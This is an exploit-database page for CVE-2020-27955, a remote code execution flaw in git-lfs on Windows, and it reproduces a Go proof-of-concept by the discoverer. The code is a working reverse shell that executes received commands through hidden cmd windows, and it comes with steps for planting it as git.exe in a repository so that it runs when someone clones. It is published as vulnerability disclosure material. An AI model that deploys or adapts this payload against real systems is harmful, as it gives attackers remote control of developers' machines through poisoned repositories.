git-lfs Remote Code Execution

🗓️ 06 Nov 2020 00:00:00Reported by Dawid GolunskiType

packetstorm🔗 packetstormsecurity.com👁 385 Views

git-lfs Remote Code Execution (RCE) vulnerability CVE-2020-27955 exploit

Reporter	Title	Published	Views	Family All 50
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	25 May 202115:26	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	4 Nov 202016:43	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	30 Apr 202114:25	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	30 Apr 202109:38	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	13 May 202110:30	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	24 Nov 202002:40	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	2 Aug 202112:32	–	githubexploit
GithubExploit	Exploit for Uncontrolled Search Path Element in Git_Large_File_Storage_Project Git_Large_File_Storage	3 Nov 202017:14	–	githubexploit
0day.today	git-lfs Remote Code Execution Exploit	8 Nov 202000:00	–	zdt
0day.today	Git git-lfs Remote Code Execution Exploit	17 Sep 202100:00	–	zdt

`/*  
Go PoC exploit for git-lfs - Remote Code Execution (RCE)  
vulnerability CVE-2020-27955  
git-lfs-RCE-exploit-CVE-2020-27955.go  
  
Discovered by Dawid Golunski  
https://legalhackers.com  
https://exploitbox.io  
  
  
Affected (RCE exploit):  
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /  
SmartGit / SourceTree etc.  
Basically the whole Windows dev world which uses git.  
  
Usage:  
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go  
Save & commit as git.exe  
  
The payload should get executed automatically on git clone operation.  
It spawns a reverse shell, or a calc.exe for testing (if it  
couldn't connect).  
  
An lfs-enabled repository with lfs files may also be needed so that git-lfs  
gets invoked. This can be achieved with:  
  
git lfs track "*.dat"  
echo "fat bug file" > lfsdata.dat  
git add .*  
git add *  
git commmit -m 'git-lfs exploit' -a  
  
Check out the full advisory for details:  
  
https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html  
  
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html  
  
PoC video at:  
https://youtu.be/tlptOf9w274  
  
** For testing purposes only **  
  
  
*/  
  
package main  
import (  
"net"  
"os/exec"  
"bufio"  
"syscall"  
)  
  
  
func revsh(host string) {  
  
c, err := net.Dial("tcp", host)  
if nil != err {  
// Conn failed  
if nil != c {  
c.Close()  
}  
// Calc for testing purposes if no listener available  
cmd := exec.Command("calc")  
cmd.Run()  
return  
}  
  
r := bufio.NewReader(c)  
for {  
runcmd, err := r.ReadString('\n')  
if nil != err {  
c.Close()  
return  
}  
cmd := exec.Command("cmd", "/C", runcmd)  
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}  
out, _ := cmd.CombinedOutput()  
c.Write(out)  
}  
}  
  
// Connect to netcat listener on local port 1337  
func main() {  
revsh("localhost:1337")  
}  
  
  
--   
Regards,  
Dawid Golunski  
https://legalhackers.com  
https://ExploitBox.io  
t: @dawid_golunski  
  
  
`

06 Nov 2020 00:00Current

8.4High risk

Vulners AI Score8.4

EPSS0.82715